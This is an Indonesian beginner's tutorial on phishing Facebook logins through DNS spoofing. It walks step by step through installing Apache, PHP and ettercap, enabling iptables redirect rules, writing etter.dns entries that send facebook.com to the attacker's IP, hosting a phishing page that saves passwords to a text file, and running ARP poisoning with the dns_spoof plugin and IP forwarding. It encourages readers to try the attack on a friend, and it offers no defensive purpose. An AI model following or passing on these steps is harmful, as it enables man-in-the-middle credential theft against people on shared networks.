Title: Implementasi Pishing Dengan Teknik DNS Spoffing
Author: yur4kh4 www.2cto.com
Website: http://www.devirakhjib.co.cc/
Language: Indonesian
Test Platform: ubuntu 10.4 (lucid)
------------------------------------------------------------------/
[*] Berpatah-patah Kata
Tulisan ini di khususkan untuk para newbie
Di kemas dengan sedikit bahasa 4la4y... ahahaha... namun tetap menjunjung tinggi ide0logi ketampanan... wekzz .,.,
Mohon maav sy sampai kan di awal tulisan, karena sy sadar sangat banyak sekali kekurangan dalam tulisan ini...
Kekurangan itu tidak lepas dari keterbatasan, ilmu pengetahuan sy,... & kehendak yang maha kuasa ..,.: p
[@] Persiapan
Implementasi pishing dengan teknik DNS spoffing ..
Teknik lama namun masih cukup ampuh untuk mengelabui client-client yang ada satu jaringan dengan kita...: P
Yang perlu kita siapkan ..
1. apache server <sudo apt-get install apache2>
2. php <sudo apt-get install php5>
3. ettercap <sudo apt-get install ettercap>
4. script pishing <cari di google or buat sendiri... or conntact sy... whatever do U want wes...: D>
5. mental yg kuat & sedang tidak dalam keadaan mabuk. akakakaka .,.
Sy anggap semua peralatan sudah di install ..
Cek apache2 yg di install tadi, ketik "localhost" pada web browser ente yang ganteng2.,.: D
Klo ada tulisan "its works" <tandanya installasi berlang?mulus... yeess ,,,
File index default dari server apache ada di/var/www
Klo ga percaya cek saja...: D
Yur4 @ localhost/var/www $ ls
Index.html
Tuch kan... cb buka file index nya...: p... wekz...,. bener kan kata sy...: p
Wokey... cukup main-mainnya...
[@] Configure
Konfigurasi ettercap <ini paling penting>
Tempat konfigurasinya ada di/etc/etter. conf
Yur4 @ localhost $ sudo gedit/etc/etter. conf
Maka akan membuka file etter. conf dengan menggunakan gedit ..
Selanjutnya cari
#---------------
# Linux
#---------------
# If you use ipchains:
# Redir_command_on = "ipchains-A input-I % iface-p tcp-s 0/0-d 0/0% port-j REDIRECT % rport"
# Redir_command_off = "ipchains-D input-I % iface-p tcp-s 0/0-d 0/0% port-j REDIRECT % rport"
# If you use iptables:
# Redir_command_on = "iptables-t nat-a prerouting-I % iface-p tcp -- dport % port-j REDIRECT -- to-port % rport"
# Redir_command_off = "iptables-t nat-d prerouting-I % iface-p tcp -- dport % port-j REDIRECT -- to-port % rport"
Hilangkan tanda pagarnya .. sehingga menjadi sepert ini
#---------------
# Linux
#---------------
# If you use ipchains:
Redir_command_on = "ipchains-A input-I % iface-p tcp-s 0/0-d 0/0% port-j REDIRECT % rport"
Redir_command_off = "ipchains-D input-I % iface-p tcp-s 0/0-d 0/0% port-j REDIRECT % rport"
# If you use iptables:
Redir_command_on = "iptables-t nat-a prerouting-I % iface-p tcp -- dport % port-j REDIRECT -- to-port % rport"
Redir_command_off = "iptables-t nat-d prerouting-I % iface-p tcp -- dport % port-j REDIRECT -- to-port % rport"
Penghilangan tanda "#" sama dengan pembebasan/meng-aktivkan... script
Kalo sudah save... & jangan di ingat-ingat lagi... ahahahaa
Selanjutnya ..
Rubah file etter. dns yang terdapat di/usr/share/ettercap
Yur4 @ localhost $ gedit/usr/share/ettercap/etter. dns
Delete isi etter. dns defaultnya & ganti menjadi seperti ini
================================ Cut here ============== ==============================
Facebook.com A 10.10.10.6
* .Facebook.com A 10.10.10.6
Www.facebook.com PTR 10.10.10.6 # Wildcards in PTR are not allowed
================================ Cut here ============== ==============================
Sedikit penjelease
Facebook.com = site yang akan kita pishing
10.10.10.6 = IP attacker
NB:
Untuk melihat ip
Yur4 @ localhost $ ifconfig
Kemudian save...
Selanjutnya... copy file-file pishing kita k/var/www
Biasanya ada 3 file .. index. php terserah.txt logs. php
Sebelumnya di hapus aja dulu index.html defaultnya y...
Beri perintah gini di file terserah.txt agar bisa di eksekusi ..
Root @ localhost/var/www $ touch terserah.txt
Root @ localhost/var/www $ chmod 777 terserah.txt
Wokeyy... saya anggap sudah di copy y...
[@] Eksekusi
Next... buka ettercap ente ..
Sekedar berbagi pengalaman sajjha .. klo sy lebih suka membuka ettercap menggunakan mode console...: D
Yur4 @ localhost $ sudo ettercap-C = mode/-I = intercafe <nama network card>
-C bisa di ganti dengan-G = mode gui-T = mode text ..
Misal:
Yur4 @ localhost $ ettercap-C-I eth0
Sy akan melakukan sniffing pada network card LAN (local area network)
Di sesuaikan sajjha dengan network card yg activ di leppy or PC ente ..
Next...
Pilih tab "sniff"> uniied sniffing> pilih network card yg aktiv... [enter]
Selanjutnya pada tab "host"> scan host ....
Kemudia berangkat k tab "plugins"> manage the plugins
Aktivkan autoadd & dns_spoff
Selanjutnya pada tab "mitm"> arp attack oning... [centang/enter]
Kemudia terakhir ke tab "start"> start sniffing ...:)
Wew., rumit dech kyx ych ..,. hee... ngga 'kq sebenarnya ..,. klo dh biasa ga rumit kq ..: p
Jangan senang dulu haruz ada 1 hal lagi di lakukan...: p
Yaitu meng-forward ip/berpura2 menjadi server lach..., wekzz .,..
Langdesksajjha... masuk ke terminal ketikan perintah ini ..
Yur4 @ localhost $ sudo nano/proc/sys/net/ipv4/ip_forward
Password: masukan password ente ..
Ganti angka 0 dengan angka 1 kemudian save... (ctrl + x> y> enter)
[@] Penutup
Sippzzz... tinggal tunggu az dech...: p
Lakukan dengan teman anda agar bisa lang?melihat hasilnya... tp kalo ga percaya...
Silahkan buka facebook.com
Login dech ..
Seperti biasa password akan tersimpan di terserah.txt
Bisa lihat di http: // localhost/terserah.txt
Tulisan ini sangat susah di mengerti... ahaha... sy yang nuliz az bingung aplgi kalian yang baca ..,.: p
Klo memang seriuz... conntact saja sy... pai_^... tanyakan semua yang belum jelas...
& Mudah-mudahan sy bisa jawab yach ..,. amin ..,.: p
+++ ++ Thankz t0 ++ ++
[&] Allah, muhammad, & seluruh pengikutnya...
[!] Malang Cyber Crew-kill-9-Indonesian coder
[%] Arianom, Tukulesto, marahmerah, kamtiez, vYc0d, xr0b0t
Contrex, mboys, Pathloader, rifle Ky, Thunder x c0de, jundab
Ibl13z, geni212, dhomas, kalong666, ichal, tucker,
& ** Akulukasaatkaupergi **&&
++ Luv der4 ++ ++